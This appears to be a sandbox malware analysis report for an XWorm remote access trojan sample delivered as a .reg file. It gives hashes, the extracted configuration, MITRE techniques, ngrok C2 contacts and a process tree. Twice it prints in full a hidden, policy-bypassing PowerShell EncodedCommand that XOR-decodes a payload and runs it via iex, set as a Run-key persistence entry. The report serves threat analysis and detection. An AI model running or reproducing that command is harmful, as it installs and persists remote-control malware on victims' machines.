xworm | 8f0700c47b590a8072cc4e12e3016788b678ffffbddb87883646697b39337074

Analysis

max time kernel
119s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-11-2024 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

B4VVtERhIuUi.reg
Size

67KB
MD5

f0e94218233968b75d2ddb2040dc6617
SHA1

4f0e5778a92de896a753d924085e163130fb5584
SHA256

8f0700c47b590a8072cc4e12e3016788b678ffffbddb87883646697b39337074
SHA512

da863d750ae25545d6ff7f2dfbc78cc971d6332f14571da47cf88ab7a36ce60ce52f7c786420e322ffbd006d96b400339f3b9a6e0aa7c49c6f84855bd6180b0b
SSDEEP

1536:D4g540DoR+MQRxYvgUV/AV18G84p1V2ktjiEmpKXS4D18WsPHDqRO:DXmE0vPmMjkwpKpjsPHDqRO

Score

10^/10

xworm defense_evasion execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:2024

Mutex

IPatGZ2f5mZd3uic

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000300000000072f-88.dat	family_xworm
behavioral2/memory/4164-97-0x00000000006E0000-0x00000000006EE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
46	4880	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4880	powershell.exe
2800	powershell.exe
1488	powershell.exe

System Binary Proxy Execution: Regsvcs/Regasm 1 TTPs 2 IoCs

Abuse Regasm to proxy execution of malicious code.

defense_evasion

Regsvcs/Regasm

T1218.009

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\RegAsm.exe	powershell.exe
Key opened	\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4164	RegAsm.exe
3364	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAUABiAEQAUgBpAFIARgBkAEcAWABXAG8AbQBQAG4AOQBkAE8ARwBKAGEAWgBrAFoATwBaADEAOQBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA="	regedit.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
46	empty.ngrok.io
45	empty.ngrok.io

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1748	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	taskmgr.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4004	regedit.exe

Runs regedit.exe 1 IoCs

pid	Process
4076	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
2800	powershell.exe
2800	powershell.exe
2800	powershell.exe
1484	taskmgr.exe
1484	taskmgr.exe
1488	powershell.exe
1488	powershell.exe
1488	powershell.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4076	regedit.exe
1484	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1484	taskmgr.exe
Token: SeSystemProfilePrivilege	1484	taskmgr.exe
Token: SeCreateGlobalPrivilege	1484	taskmgr.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	4164	RegAsm.exe
Token: SeDebugPrivilege	3364	RegAsm.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe
1484	taskmgr.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3100 wrote to memory of 4880	3100	powershell.exe	109
PID 3100 wrote to memory of 4880	3100	powershell.exe	109
PID 4880 wrote to memory of 2800	4880	powershell.exe	110
PID 4880 wrote to memory of 2800	4880	powershell.exe	110
PID 2800 wrote to memory of 600	2800	powershell.exe	111
PID 2800 wrote to memory of 600	2800	powershell.exe	111
PID 600 wrote to memory of 4660	600	csc.exe	112
PID 600 wrote to memory of 4660	600	csc.exe	112
PID 2800 wrote to memory of 5052	2800	powershell.exe	113
PID 2800 wrote to memory of 5052	2800	powershell.exe	113
PID 4880 wrote to memory of 4164	4880	powershell.exe	120
PID 4880 wrote to memory of 4164	4880	powershell.exe	120

C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\B4VVtERhIuUi.reg"
1⤵
- Adds Run key to start application
- Runs .reg file with regedit
PID:4004

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
1⤵
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAUABiAEQAUgBpAFIARgBkAEcAWABXAG8AbQBQAG4AOQBkAE8ARwBKAGEAWgBrAFoATwBaADEAOQBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Binary Proxy Execution: Regsvcs/Regasm
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
